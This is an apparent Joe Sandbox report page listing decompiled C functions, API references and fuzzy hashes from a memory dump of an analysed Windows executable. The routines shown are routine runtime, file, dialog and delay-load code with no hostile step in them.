0x00a58e2d
0x00000000
0x00000000
0x00a58e2d
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00A54286,?,0000015D,?,?,?,?,00A55762,000000FF,00000000,?,?), ref: 00A58E38

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8b16b73721a81cc006aa8408b493b34cf5bd71073b2fcf3af5c2127c0c5868ab
Instruction ID: 46e0180e54ad4641046155962b46c101d7f0e33d98b30bf696ae3495f0cd0b0c
Opcode Fuzzy Hash: 8b16b73721a81cc006aa8408b493b34cf5bd71073b2fcf3af5c2127c0c5868ab
Instruction Fuzzy Hash: 6FE065312061255AEA7127659D06B9F7678BF517A6F150111BC19B6091DF7CCC0982E1

Uniqueness

Uniqueness Score: -1.00%

Function 00A35ABD Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00A35ABD(intOrPtr __ecx, void* __eflags) {
				void* _t36;

				E00A4EB78(0xa62739, _t36);
				_push(__ecx);
				 *((intOrPtr*)(_t36 - 0x10)) = __ecx;
				E00A3B505(__ecx); // executed
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				E00A40637();
				 *(_t36 - 4) = 1;
				E00A40637();
				 *(_t36 - 4) = 2;
				E00A40637();
				 *(_t36 - 4) = 3;
				E00A40637();
				 *(_t36 - 4) = 4;
				E00A40637();
				 *(_t36 - 4) = 5;
				E00A35CAC(__ecx,  *(_t36 - 4));
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return __ecx;
			}

0x00a35ac2
0x00a35ac7
0x00a35acb
0x00a35ace
0x00a35ad3
0x00a35add
0x00a35ae8
0x00a35aec
0x00a35af7
0x00a35afb
0x00a35b06
0x00a35b0a
0x00a35b15
0x00a35b19
0x00a35b20
0x00a35b24
0x00a35b2f
0x00a35b37

APIs

__EH_prolog.LIBCMT ref: 00A35AC2

Part of subcall function 00A3B505: __EH_prolog.LIBCMT ref: 00A3B50A

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ab749c61a8ff48e730cccc1c07e5a7fdb5120e57ee4cc81dcb6bbff6cf22ae37
Instruction ID: 788ca7179571458a620a85d850edd34a8788269b22170af1b4d646db8e174fec
Opcode Fuzzy Hash: ab749c61a8ff48e730cccc1c07e5a7fdb5120e57ee4cc81dcb6bbff6cf22ae37
Instruction Fuzzy Hash: 7E018C349106D0DAD725EBB8C241FDDFBA4DFA4304F51848DA55763282CBB41B08E7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00A39620 Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00A39620(void* __ecx) {
				void* _t16;
				void* _t21;

				_t21 = __ecx;
				_t16 = 1;
				if( *(__ecx + 8) != 0xffffffff) {
					if( *((char*)(__ecx + 0x15)) == 0 &&  *((intOrPtr*)(__ecx + 0x10)) == 0) {
						_t5 = FindCloseChangeNotification( *(__ecx + 8)) - 1; // -1
						asm("sbb bl, bl");
						_t16 =  ~_t5 + 1;
					}
					 *(_t21 + 8) =  *(_t21 + 8) | 0xffffffff;
				}
				 *(_t21 + 0x10) =  *(_t21 + 0x10) & 0x00000000;
				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x1e)) != _t16) {
					E00A36BD5(0xa71098, _t21 + 0x32);
				}
				return _t16;
			}

0x00a39622
0x00a39624
0x00a3962a
0x00a39630
0x00a39641
0x00a39646
0x00a39648
0x00a39648
0x00a3964a
0x00a3964a
0x00a3964e
0x00a39654
0x00a39664
0x00a39664
0x00a3966d

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00A395D6,?,?,?,?,?,00A62641,000000FF), ref: 00A3963B

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ce9cf64f8bb5e1b15d7bd1702bc8909ca78dbc9ae897e689b7d328ecde00a974
Instruction ID: 82e66fb11ad68f6183c65300d8a36a5cf294bc790ef720c99431e0fd07157240
Opcode Fuzzy Hash: ce9cf64f8bb5e1b15d7bd1702bc8909ca78dbc9ae897e689b7d328ecde00a974
Instruction Fuzzy Hash: 80F08971482B159FDB308B64C85B793B7E86B12321F045B1EE0E6429E0E7A1698E8A40

Uniqueness

Uniqueness Score: -1.00%

Function 00A3A56D Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A3A56D(void* __ecx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
				void* _t13;
				intOrPtr _t19;

				_t19 = _a8;
				 *((char*)(_t19 + 0x1044)) = 0;
				if(E00A3BDB4(_a4) != 0) {
					L3:
					return 0;
				}
				_t13 = E00A3A69B(0xffffffff, _a4, _t19); // executed
				if(_t13 == 0xffffffff) {
					goto L3;
				}
				FindClose(_t13); // executed
				 *(_t19 + 0x1040) =  *(_t19 + 0x1040) & 0x00000000;
				 *((char*)(_t19 + 0x100c)) = E00A3A28F( *((intOrPtr*)(_t19 + 0x1008)));
				 *((char*)(_t19 + 0x100d)) = E00A3A2A6( *((intOrPtr*)(_t19 + 0x1008)));
				return 1;
			}

0x00a3a56e
0x00a3a576
0x00a3a584
0x00a3a5cb
0x00000000
0x00a3a5cb
0x00a3a58d
0x00a3a595
0x00000000
0x00000000
0x00a3a598
0x00a3a5a4
0x00a3a5b6
0x00a3a5c1
0x00000000

APIs

Part of subcall function 00A3A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A6C4
Part of subcall function 00A3A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A6F2
Part of subcall function 00A3A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00A3A598

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 7c31460758a6ee921aba111506c79bf125b55eae0569ee5eec2d6f4b87534ef5
Instruction ID: 837e4280af6ad67576eab6bbf6a78a8eced959a66d51fcae33680e7f389ac292
Opcode Fuzzy Hash: 7c31460758a6ee921aba111506c79bf125b55eae0569ee5eec2d6f4b87534ef5
Instruction Fuzzy Hash: 68F082320087A0ABCB2257F48A05BCB7BA06F2A331F048A4DF1FD521A6C37550999B33

Uniqueness

Uniqueness Score: -1.00%

Function 00A40E08 Relevance: 1.5, APIs: 1, Instructions: 21
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00A40E08() {
				void* __esi;
				void* _t2;

				L00A41B58(); // executed
				_t2 = E00A41B5D();
				if(_t2 != 0) {
					_t2 = E00A36C31(_t2, 0xa71098, 0xff, 0xff);
				}
				if( *0xa710a4 != 0) {
					_t2 = E00A36C31(_t2, 0xa71098, 0xff, 0xff);
				}
				__imp__SetThreadExecutionState(1);
				return _t2;
			}

0x00a40e0a
0x00a40e0f
0x00a40e20
0x00a40e25
0x00a40e25
0x00a40e31
0x00a40e36
0x00a40e36
0x00a40e3d
0x00a40e45

APIs

SetThreadExecutionState.KERNEL32 ref: 00A40E3D

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 2068df01af553ce9c0e726d998296d583b66d18b803916579d9c112decddf011
Instruction ID: fa8f3b3b44e68215f7748c37a650f089c2ae3e27aeb5556d396d6b7d08a66b81
Opcode Fuzzy Hash: 2068df01af553ce9c0e726d998296d583b66d18b803916579d9c112decddf011
Instruction Fuzzy Hash: 38D01215A010546ADA1173686A56BFF29468FC6315F0D4465F14957182DA684CC7B261

Uniqueness

Uniqueness Score: -1.00%

Function 00A4A626 Relevance: 1.5, APIs: 1, Instructions: 16
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00A4A626(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t6;

				_push(__ecx);
				_push(0x10);
				L00A4EB02();
				_v8 = __eax;
				if(__eax == 0) {
					return 0;
				}
				_t6 = E00A4A3B9(__eax, _a4, _a8); // executed
				return _t6;
			}

0x00a4a629
0x00a4a62a
0x00a4a62c
0x00a4a631
0x00a4a636
0x00000000
0x00a4a647
0x00a4a640
0x00000000

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00A4A62C

Part of subcall function 00A4A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A4A3DA

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: 962a665f2f3ea88f453dbb402df6b5d163f7564295699c514a6a78523f89f788
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: EBD0A77924020876DF01AF218D0296EB595EB90340F10C021B841C5142FAB1D9109156

Uniqueness

Uniqueness Score: -1.00%

Function 00A4E5BB Relevance: 1.5, APIs: 1, Instructions: 13
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00A4E5BB(void* __esi) {
				void* _t2;
				intOrPtr _t5;
				void* _t6;
				void* _t11;

				_t11 = __esi;
				if(( *0xa65650 & 0x00001000) == 0) {
					return _t2;
				} else {
					E00A4E664();
					_t5 =  *0xa91ce8 + 1;
					 *0xa91ce8 = _t5;
					if(_t5 == 1) {
						E00A4E78D(4, 0xa91cec); // executed
					}
					_t6 = E00A4E5EE();
					if(_t6 == 0) {
						 *0xa91ce4 = 0;
						return _t6;
					} else {
						 *0xa63278(0xa91ce4, _t11);
						return  *((intOrPtr*)( *0xa91ce0))();
					}
				}
			}

0x00a4e5bb
0x00a4e5c5
0x00a4e5ed
0x00a4e5c7
0x00a4e5c7
0x00a4e5d1
0x00a4e5d2
0x00a4e5da
0x00a4e5e3
0x00a4e5e3
0x00a4e831
0x00a4e838
0x00a4e852
0x00a4e85c
0x00a4e83a
0x00a4e848
0x00a4e851
0x00a4e851
0x00a4e838

APIs

DloadProtectSection.DELAYIMP ref: 00A4E5E3

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: c41a76a30f9d0ed5d32e6353ad1d317c22a20d51b5a419f81eb03b41846b804d
Instruction ID: c0df8d95620f4d29909c9ee824a75d911945a2dbfc0436e40ac34beefe0d259e
Opcode Fuzzy Hash: c41a76a30f9d0ed5d32e6353ad1d317c22a20d51b5a419f81eb03b41846b804d
Instruction Fuzzy Hash: F6D012BC6C02819BDB41EBFCA946F1433A4B3A4715F940502F245E1491DFA44882C606

Uniqueness

Uniqueness Score: -1.00%

Function 00A4DD6D Relevance: 1.5, APIs: 1, Instructions: 13
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A4DD6D(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _t7;

				SendDlgItemMessageW( *0xa78458, 0x6a, 0x402, E00A40264(_a20, _a24, _a28, _a32), 0); // executed
				_t7 = E00A4B568(); // executed
				return _t7;
			}

0x00a4dd92
0x00a4dd98
0x00a4dd9d

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00A41B3E), ref: 00A4DD92

Part of subcall function 00A4B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A4B579
Part of subcall function 00A4B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4B58A
Part of subcall function 00A4B568: IsDialogMessageW.USER32(0001041E,?), ref: 00A4B59E
Part of subcall function 00A4B568: TranslateMessage.USER32(?), ref: 00A4B5AC
Part of subcall function 00A4B568: DispatchMessageW.USER32(?), ref: 00A4B5B6

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: fb3312c20baccc843bc47835c797e08347125b924fd90a1c611ae66fbe70b9dc
Instruction ID: 63b0f908d89d66a36bdfc3c74d2ed754b0f78049b4fa8c9f0dfe8ca4b9fc8f36
Opcode Fuzzy Hash: fb3312c20baccc843bc47835c797e08347125b924fd90a1c611ae66fbe70b9dc
Instruction Fuzzy Hash: 96D09E36144300BADA016B91CE06F0A7AA2AB98B08F004955B389740F18AB29D61EB12

Uniqueness

Uniqueness Score: -1.00%

Function 00A398BC Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A398BC(void* __ecx) {
				long _t3;

				if( *(__ecx + 8) != 0xffffffff) {
					_t3 = GetFileType( *(__ecx + 8)); // executed
					if(_t3 == 2 || _t3 == 3) {
						return 1;
					} else {
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x00a398c0
0x00a398c8
0x00a398d1
0x00a398da
0x00000000
0x00000000
0x00000000
0x00a398c2
0x00a398c2
0x00a398c4
0x00a398c4

APIs

GetFileType.KERNELBASE(000000FF,00A397BE), ref: 00A398C8

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: f0b97a5b026ad3e2b3c05499c640a7a775edec1e2c978619d6385d6150fd7524
Instruction ID: 729b4d39558fcfb4834db19cdf36f7381a774bdfd01348f2885fdf0dffef6cf3
Opcode Fuzzy Hash: f0b97a5b026ad3e2b3c05499c640a7a775edec1e2c978619d6385d6150fd7524
Instruction Fuzzy Hash: 79C00235404205958E2197249845096B761AA93365BB496D4E069850B1C362CD57EE11

Uniqueness

Uniqueness Score: -1.00%

Function 00A4E2B4 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A4E2B4() {

				E00A4E85D(0xa6c5ec, 0xa93110); // executed
				goto __eax;
			}

0x00a4e1e3
0x00a4e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3

Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c8073131966edb30f45e26767bc2719b403d4d6f9724f634dcd9d56b361ce357
Instruction ID: 0aaa9ed874c9bc62cac5f72a92879a05c7acc5f07ebcc7131774c86cd93ce3fa
Opcode Fuzzy Hash: c8073131966edb30f45e26767bc2719b403d4d6f9724f634dcd9d56b361ce357
Instruction Fuzzy Hash: 60B012EA3DC000BC3D44E1491D03C37017CF0C4B203304A3EF806C00D0D8407C000531

Uniqueness

Uniqueness Score: -1.00%

Function 00A4E20A Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A4E20A() {

				E00A4E85D(0xa6c5ec, 0xa93154); // executed
				goto __eax;
			}

0x00a4e1e3
0x00a4e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3

Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c9097d686f58a44434a87dab36275b1812c67a6a5d4b270717db23a4ff49d5a7
Instruction ID: b689806b20b60a6dda6b79081011654163013f149545203da44b3f9609161a83
Opcode Fuzzy Hash: c9097d686f58a44434a87dab36275b1812c67a6a5d4b270717db23a4ff49d5a7
Instruction Fuzzy Hash: 6EB012EE3DD000BC3D44E2091E02C37017CE0C4B20330863EF806C0180DC507D090531

Uniqueness

Uniqueness Score: -1.00%

Function 00A4E528 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A4E528() {

				E00A4E85D(0xa6c66c, 0xa93084); // executed
				goto __eax;
			}

0x00a4e51f
0x00a4e526

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00A4E51F

Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4710b9515bd1e19494a98f5ad70e0721b7d24a08b876a43957a7225f6870da05
Instruction ID: d3eea07ce975d023b2ecd43ddd8f61393e07189822098602e6e37f82fe9249d7
Opcode Fuzzy Hash: 4710b9515bd1e19494a98f5ad70e0721b7d24a08b876a43957a7225f6870da05
Instruction Fuzzy Hash: 92B012DE7580407C3D04E1095E02C3B457CE4C1F20330942EF406C4480E8810C010533

Uniqueness

Uniqueness Score: -1.00%

Function 00A4E532 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A4E532() {

				E00A4E85D(0xa6c66c, 0xa93080); // executed
				goto __eax;
			}

0x00a4e51f
0x00a4e526

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00A4E51F

Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fed0578c2ab7fbe981481ccfe3cd4ae461bf8239e4e921eaf2586db15c125412
Instruction ID: 3acb8b3fdd740c687930b8c9bd99ba9d7ce34b797fd77a89ae45ae46057a352e
Opcode Fuzzy Hash: fed0578c2ab7fbe981481ccfe3cd4ae461bf8239e4e921eaf2586db15c125412
Instruction Fuzzy Hash: 4EB012DE7580007D3D04E1095D02D3B017CF4C1F20330542EF406C4480E8800C000533

Uniqueness

Uniqueness Score: -1.00%

Function 00A39F09 Relevance: 1.5, APIs: 1, Instructions: 7
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00A39F09(void* __ecx) {
				int _t2;

				_t2 = SetEndOfFile( *(__ecx + 8)); // executed
				asm("sbb al, al");
				return  ~(_t2 - 1) + 1;
			}

0x00a39f0c
0x00a39f15
0x00a39f19

APIs

SetEndOfFile.KERNELBASE(?,00A3903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00A39F0C

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
